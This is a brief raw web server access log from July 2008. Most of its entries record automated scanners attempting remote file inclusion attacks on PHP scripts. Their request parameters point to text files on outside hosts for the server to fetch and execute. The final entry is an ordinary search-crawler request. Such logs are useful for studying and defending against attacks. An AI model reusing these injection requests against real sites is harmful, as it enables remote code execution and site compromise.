213.35.225.138 - - [02/Jul/2008:23:44:59 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
213.35.225.138 - - [02/Jul/2008:23:44:59 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
200.76.111.11 - - [02/Jul/2008:23:45:26 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.iglesialcs.cl/newweb/images/arab.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.65"
200.76.111.11 - - [02/Jul/2008:23:45:26 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://www.iglesialcs.cl/newweb/images/arab.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.65"
87.106.98.71 - - [02/Jul/2008:23:48:58 -0500] "GET /logs//?pag=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 200 89857 "-""libwww-perl/5.805"
87.106.98.71 - - [02/Jul/2008:23:48:58 -0500] "GET //?pag=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
74.6.18.217 - - [02/Jul/2008:23:49:08 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
